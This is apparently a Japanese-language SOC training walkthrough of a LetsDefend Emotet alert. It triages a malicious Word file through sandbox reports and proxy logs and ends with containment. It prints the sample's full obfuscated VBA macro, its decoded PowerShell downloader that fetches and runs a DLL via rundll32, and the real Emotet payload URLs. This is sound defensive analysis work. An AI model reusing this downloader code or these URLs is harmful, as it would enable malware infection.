LetsDefend level 1 alert SOC109 - Emotet Malware Detected event-id 39
- Details
- playbook
- End
Details
EventID: 39
Event Time: Jan. 1, 2021, 4:45 p.m.
Rule: SOC109 - Emotet Malware Detected
Level: Security Analyst
Source Address 172.16.17.83
Source Hostname Maxim
File Name MES 2020_12_31 S632974.doc
File Hash eee99e6d8ade9463dd206dfbad3485ea
File Size 161.36 Kb
Device Action Allowed
Download (Password:infected): eee99e6d8ade9463dd206dfbad3485ea.zip
playbook
Define Threat Indicator
Answer: Other
Check if the malware is quarantined/cleaned
Device Action Allowed
Answer: Not Quarantined
Analyze Malware
eee99e6d8ade9463dd206dfbad3485ea
VirusTotal 47/62: https://www.virustotal.com/gui/file/70450709057b656283751c362a7b72b9b0232ddd86f8482016ee85947392e27c
Hybrid Analysis: https://www.hybrid-analysis.com/sample/70450709057b656283751c362a7b72b9b0232ddd86f8482016ee85947392e27c/5fefe8368593b70319655413
ANYRUN: https://app.any.run/tasks/5621decd-153d-4982-92c6-e7bddeafde2e/
VirusTotalを見ると多くのベンダーで登録されている既知のマルウェアのようだ。
VBAマクロを実行し、リモートのサーバからファイルを取得している。
このファイルをoletoolsのolevbaで見てみると、
Private Sub Document_open() Rscxe50kzk0uy8c57h End Sub --- Function Rscxe50kzk0uy8c57h() On Error Resume Next mKbjhqs = Yfz878jqfi8emxj8k.StoryRanges.Item(4 / 4) GoTo GgbBEBHp Dim agRmIUza As Object Set agRmIUza = CreateObject("Scripting.FileSystemObject") Dim GgbBEBHp As Object Set GgbBEBHp = agRmIUza.CreateTextFile("K:\hHLZv\tivKHBG.fyEWE") GgbBEBHp.WriteLine " " GgbBEBHp.Close Set agRmIUza = Nothing Set GgbBEBHp = Nothing GgbBEBHp: snahbsd = "]e1r[Sp]e1r[S" Lq83qqs1pfyjio1yve = "]e1r[Sro]e1r[S]e1r[Sce]e1r[Ss]e1r[Ss]e1r[S]e1r[S" GoTo XgvEJCBN Dim QziRLaIvB As Object Set QziRLaIvB = CreateObject("Scripting.FileSystemObject") Dim XgvEJCBN As Object Set XgvEJCBN = QziRLaIvB.CreateTextFile("K:\ngiHBhtC\UfeKFo.VughFHEh") XgvEJCBN.WriteLine " " XgvEJCBN.Close Set QziRLaIvB = Nothing Set XgvEJCBN = Nothing XgvEJCBN: U5loi1_jmnzaqiegq = "]e1r[S:w]e1r[S]e1r[Sin]e1r[S3]e1r[S2]e1r[S_]e1r[S" GoTo hgtMNEDC Dim CZSeKtG As Object Set CZSeKtG = CreateObject("Scripting.FileSystemObject") Dim hgtMNEDC As Object Set hgtMNEDC = CZSeKtG.CreateTextFile("K:\cpFBJFDH\xlJbHCC.QYTeJIEGD") hgtMNEDC.WriteLine " " hgtMNEDC.Close Set CZSeKtG = Nothing Set hgtMNEDC = Nothing hgtMNEDC: H_7tattyau5usczkpn = "w]e1r[Sin]e1r[Sm]e1r[Sgm]e1r[St]e1r[S]e1r[S" GoTo KiKEBuJUJ Dim PTQDJLrW As Object Set PTQDJLrW = CreateObject("Scripting.FileSystemObject") Dim KiKEBuJUJ As Object Set KiKEBuJUJ = PTQDJLrW.CreateTextFile("K:\soeBQFQDw\WMRIMPG.JKyoFAF") KiKEBuJUJ.WriteLine " " KiKEBuJUJ.Close Set PTQDJLrW = Nothing Set KiKEBuJUJ = Nothing KiKEBuJUJ: B0r8pge9ex02he = "]e1r[S" + Mid(Application.Name, 6, 1) + "]e1r[S" GoTo VvbAPGB Dim wHaMWCAF As Object Set wHaMWCAF = CreateObject("Scripting.FileSystemObject") Dim VvbAPGB As Object Set VvbAPGB = wHaMWCAF.CreateTextFile("K:\bzWJHl\KFaka.azsvpH") VvbAPGB.WriteLine " " VvbAPGB.Close Set wHaMWCAF = Nothing Set VvbAPGB = Nothing VvbAPGB: Opoqhvp43yj = H_7tattyau5usczkpn + B0r8pge9ex02he + U5loi1_jmnzaqiegq + snahbsd + Lq83qqs1pfyjio1yve GoTo eNfOI Dim EatwI As 
Object Set EatwI = CreateObject("Scripting.FileSystemObject") Dim eNfOI As Object Set eNfOI = EatwI.CreateTextFile("K:\rThUJp\jvUYFCcC.bwpqgxnl") eNfOI.WriteLine " " eNfOI.Close Set EatwI = Nothing Set eNfOI = Nothing eNfOI: Z13pi8fctd_bd7 = H_f1l3q4wuv(Opoqhvp43yj) GoTo mttHC Dim ZUSgTSS As Object Set ZUSgTSS = CreateObject("Scripting.FileSystemObject") Dim mttHC As Object Set mttHC = ZUSgTSS.CreateTextFile("K:\tRMsNA\ZxNIJGBC.emQhvJFE") mttHC.WriteLine " " mttHC.Close Set ZUSgTSS = Nothing Set mttHC = Nothing mttHC: Set M3zy0l7te6wcqq4_r = CreateObject(Z13pi8fctd_bd7) GoTo XCtMEEHQH Dim JEnFGGAH As Object Set JEnFGGAH = CreateObject("Scripting.FileSystemObject") Dim XCtMEEHQH As Object Set XCtMEEHQH = JEnFGGAH.CreateTextFile("K:\KUvdSiCG\SWvOUGCM.yuplAASB") XCtMEEHQH.WriteLine " " XCtMEEHQH.Close Set JEnFGGAH = Nothing Set XCtMEEHQH = Nothing XCtMEEHQH: Px4akgkluolo7in096 = Mid(mKbjhqs, (15 / 3), Len(mKbjhqs)) GoTo pHBuBEG Dim gSXBEs As Object Set gSXBEs = CreateObject("Scripting.FileSystemObject") Dim pHBuBEG As Object Set pHBuBEG = gSXBEs.CreateTextFile("K:\TskVJVn\aafpAJrAE.vUXKLFw") pHBuBEG.WriteLine " " pHBuBEG.Close Set gSXBEs = Nothing Set pHBuBEG = Nothing pHBuBEG: GoTo cxLTHBCC Dim aNVjIUF As Object Set aNVjIUF = CreateObject("Scripting.FileSystemObject") Dim cxLTHBCC As Object Set cxLTHBCC = aNVjIUF.CreateTextFile("K:\WJmHGBxDH\atxzHEHY.mWWMoDHPG") cxLTHBCC.WriteLine " " cxLTHBCC.Close Set aNVjIUF = Nothing Set cxLTHBCC = Nothing cxLTHBCC: M3zy0l7te6wcqq4_r.Create H_f1l3q4wuv(Px4akgkluolo7in096), Rzvbvgf_vxrf, I3hfd4821r3zv GoTo pyPIA Dim qhLiwn As Object Set qhLiwn = CreateObject("Scripting.FileSystemObject") Dim pyPIA As Object Set pyPIA = qhLiwn.CreateTextFile("K:\GGDxTNF\IePRJDt.eCBBOz") pyPIA.WriteLine " " pyPIA.Close Set qhLiwn = Nothing Set pyPIA = Nothing pyPIA: GoTo YiaTHFMA Dim LPMlGRFHC As Object Set LPMlGRFHC = CreateObject("Scripting.FileSystemObject") Dim YiaTHFMA As Object Set YiaTHFMA = 
LPMlGRFHC.CreateTextFile("K:\fFLaGYBH\ZvDXsFT.IXtjnt") YiaTHFMA.WriteLine " " YiaTHFMA.Close Set LPMlGRFHC = Nothing Set YiaTHFMA = Nothing YiaTHFMA: End Function Function H_f1l3q4wuv(H11p8eic2w3zn_) On Error Resume Next GoTo jkZdJG Dim mfixAuM As Object Set mfixAuM = CreateObject("Scripting.FileSystemObject") Dim jkZdJG As Object Set jkZdJG = mfixAuM.CreateTextFile("K:\bVbhWbGD\jTqgJ.GHrZkJCF") jkZdJG.WriteLine " " jkZdJG.Close Set mfixAuM = Nothing Set jkZdJG = Nothing jkZdJG: Bfizqcunyu0 = (H11p8eic2w3zn_) GoTo SeNkICAJ Dim HRDLEVmi As Object Set HRDLEVmi = CreateObject("Scripting.FileSystemObject") Dim SeNkICAJ As Object Set SeNkICAJ = HRDLEVmi.CreateTextFile("K:\AkYbFA\BnmqHkXA.oujVB") SeNkICAJ.WriteLine " " SeNkICAJ.Close Set HRDLEVmi = Nothing Set SeNkICAJ = Nothing SeNkICAJ: P_eiv2i047gos2b = Zh7kypwwff0md33a(Bfizqcunyu0) GoTo ZyJBNBD Dim kIuKr As Object Set kIuKr = CreateObject("Scripting.FileSystemObject") Dim ZyJBNBD As Object Set ZyJBNBD = kIuKr.CreateTextFile("K:\inSuIwND\usjkXC.fwloXI") ZyJBNBD.WriteLine " " ZyJBNBD.Close Set kIuKr = Nothing Set ZyJBNBD = Nothing ZyJBNBD: H_f1l3q4wuv = P_eiv2i047gos2b GoTo qoPKJgV Dim naVxBFJAJ As Object Set naVxBFJAJ = CreateObject("Scripting.FileSystemObject") Dim qoPKJgV As Object Set qoPKJgV = naVxBFJAJ.CreateTextFile("K:\JhzlFCAB\Jfiuz.aptrJGAA") qoPKJgV.WriteLine " " qoPKJgV.Close Set naVxBFJAJ = Nothing Set qoPKJgV = Nothing qoPKJgV: End Function Function Zh7kypwwff0md33a(L34u2dzesgzcfaiwy) Zlnor_53jwsrz = Ziq909ju8euif9uz GoTo HQnFde Dim aNITDI As Object Set aNITDI = CreateObject("Scripting.FileSystemObject") Dim HQnFde As Object Set HQnFde = aNITDI.CreateTextFile("K:\RMIpGDjgI\TjPglA.JFIpEFW") HQnFde.WriteLine " " HQnFde.Close Set aNITDI = Nothing Set HQnFde = Nothing HQnFde: Zh7kypwwff0md33a = Replace(L34u2dzesgzcfaiwy, "]e1r[S", Rnclsjpi29gic5) GoTo UMVjHQHCH Dim gscDYEBhG As Object Set gscDYEBhG = CreateObject("Scripting.FileSystemObject") Dim UMVjHQHCH As Object Set UMVjHQHCH = 
gscDYEBhG.CreateTextFile("K:\yJFQHkpC\FiUeelAjF.QixxE") UMVjHQHCH.WriteLine " " UMVjHQHCH.Close Set gscDYEBhG = Nothing Set UMVjHQHCH = Nothing UMVjHQHCH: End Function
おそらくこのVBAは次のコマンドを実行している。
cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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
実行しているpowershellのコマンドは、
SET-itEm ('v'+'ArIa'+'b'+'LE:tIS8'+'Cq') ([tyPE]("{0}{3}{5}{4}{1}{2}" -f's','.DIR','ECTORy','yStem','IO','.') ) ; SEt-item VARiaBle:85Y ([TYPE]("{5}{3}{2}{8}{1}{0}{4}{9}{7}{6}" -F 'r','.Se','M.','TE','VICePO','syS','aNaGer','TM','NeT','In')) ;$ErrorActionPreference = (('S'+'ilen'+'tl')+'yC'+('ontin'+'u')+'e');$Gmlthp7=$B76C + [char](64) + $P46X;$T37Y=(('D'+'35')+'I'); $TIs8Cq::"CrE`At`EdIrec`TOrY"($HOME + ((('G6'+'T'+'F2s')+('2k'+'3m')+('G6T'+'Jw')+'w9'+'w_'+'bG'+'6T') -rEPlace([ChaR]71+[ChaR]54+[ChaR]84),[ChaR]92));$U04Z=('F'+('57'+'U')); ( vARiAbLe 85y -ValueO)::"seCUr`i`TYpROtO`cOl" = ('Tl'+('s1'+'2'));$J34O=('Q0'+'9A');$T4w3gou = ('L'+('_'+'0E'));$D05Q=('T2'+'8L');$Odwumkx=$HOME+(('{0}F2s'+('2'+'k3')+'m{0}Jww'+('9w'+'_b')+'{0'+'}') -F[cHAR]92)+$T4w3gou+(('.d'+'l')+'l');$E37Q=(('E'+'98')+'H');$Azgl82n=((']e1'+'r')+('['+'S://')+'de'+'c'+('p'+'ak.c')+'o'+('m'+'/cg')+('i'+'-bin/gU'+'/@]')+('e'+'1r')+'[S'+':'+'/'+('/a'+'n')+('gel'+'sl')+('li'+'m')+('a'+'r'+'gas.com/A'+'UD')+('I'+'O/3d')+('wm/@'+']'+'e1'+'r[')+('S'+'://g')+('ad'+'g')+'e'+('tb'+'ay.')+('co'+'m')+'/l'+('etsd'+'e'+'al/g'+'dFjfQ/@')+(']'+'e1')+('r[S'+'s')+(':'+'//cs'+'gcarg'+'o'+'.com/conte'+'nt')+('/Gb/'+'@'+']e1r')+'['+('S:/'+'/')+'a'+('a'+'gzz')+'.c'+'o'+('m/wp'+'-con'+'te')+'nt'+'/K'+('P'+'/@')+(']e'+'1r[Ss'+':')+('//meta'+'d')+'or'+('r'+'.c')+('om/'+'ALFA')+'_'+('DA'+'TA/')+'Bt'+('fM'+'8')+('I'+'d/@]e1'+'r['+'S'+'s://s')+'e'+'n'+('turk'+'e')+('ti'+'caret.co'+'m/'+'wp'+'-ad')+('min'+'/yO'+'l/'))."Rep`L`Ace"((']'+'e1'+('r['+'S')),([array]('sd','sw'),(('h'+'tt')+'p'),'3d')[1])."Spl`it"($M01L + $Gmlthp7 + $G55S);$U12Y=('I_'+'0I');foreach ($Xrc_t6r in $Azgl82n){try{(&('New-O'+'b'+'ject') sySTem.Net.WEbclieNt)."Do`WNLOadfI`Le"($Xrc_t6r, $Odwumkx);$E70P=('J'+('42'+'C'));If ((.('Get-'+'Ite'+'m') $Odwumkx)."LeNg`TH" -ge 39163) {&('rund'+'l'+'l32') $Odwumkx,('C'+('on'+'t')+('ro'+'l_Ru')+'n'+('DL'+'L'))."tO`sT`RING"();$G65O=(('W_'+'4')+'F');break;$T_4F=('D7'+'4P')}}catch{}}$V55O=('A'+('5'+'2Z'))
このスクリプトは、以下のURLから何かを取得しようとしている。
http://decpak.com/cgi-bin/gU/ http://angelsllimargas.com/AUDIO/3dwm/ http://gadgetbay.com/letsdeal/gdFjfQ/ https://csgcargo.com/content/Gb/ http://aagzz.com/wp-content/KP/ https://metadorr.com/ALFA_DATA/BtfM8Id/ https://senturketicaret.com/wp-admin/yOl/
このURLを調べると例えば、
http[:]//decpak.com/cgi-bin/gU/
URLhaus: https://urlhaus.abuse.ch/url/945783/
Emotet!!!
Answer: Malicious
Check If Someone Requested the C2
Log search - 172.16.17.83
172.16.17.83からのアクセスを見る。
# | DATE | TYPE | SOURCE ADDRESS | SOURCE PORT | DESTINATION ADDRESS | DESTINATION PORT |
---|---|---|---|---|---|---|
330 | Jan, 01, 2021, 04:41 PM | Proxy | 172.16.17.83 | 14441 | 23.111.174.153 | 80 |
331 | Jan, 01, 2021, 04:42 PM | Proxy | 172.16.17.83 | 15431 | 152.170.79.100 | 80 |
332 | Jan, 01, 2021, 04:43 PM | Proxy | 172.16.17.83 | 23121 | 190.247.139.101 | 80 |
330
URL: http://decpak.com/cgi-bin/gU/ Request Method: GET
331
URL: http://152.170.79.100/076ay2uof/umojx2x1vf1qjjk/hue4e670x/d3eobn8z0k0rp/syaxabx0loj/erz7hayf/ Request Method: GET
332
URL: http://190.247.139.101/i3u3l3e3n96/sow63klj/pkv3runqw/dudwqjl4zg8l7hk6ah6/huulsuajy/nibyefksabf1mz63/ Request Method: GET
先ほど挙げたemotetに関連するサーバへのアクセスを確認した。
また、152.170.79.100と190.247.139.101に関してはVirusTotalで見ると、
152.170.79.100: https://www.virustotal.com/gui/ip-address/152.170.79.100/community
190.247.139.101: https://www.virustotal.com/gui/ip-address/190.247.139.101/community
Emotetと関連するというレポートがある。
Answer: Accessed
Containment
Endpoint - Maxim 172.16.17.83
CMD History
01.01.2021 10:21: ipconfig
01.01.2021 10:22: netsh interface ipv4 show config
01.01.2021 10:23: arp -a
emotetによるネットワークの情報収集か。
Network Connections
01.01.2021 16:21: 172.217.169.174
01.01.2021 16:22: 172.217.169.174
01.01.2021 16:23: 172.217.169.174
01.01.2021 16:42: 152.170.79.100
01.01.2021 16:43: 190.247.139.101
172.217.169.174は問題無さそう。
Add Artifacts
Value | Type | Comment |
---|---|---|
f2d0c66b801244c059f636d08a474079 | MD5 Hash | malicious word file |
https[:]//filetransfer[.]io/data-package/UR2whuBv/download | URL Address | file sending service |
End
近年のmalwareは、やはりemotetが流行りか。ANYRUNへの2021年のアップロードは、njRATが多かったようだが実際のマルウェア感染の件数や被害としてはemotetが多いイメージがある。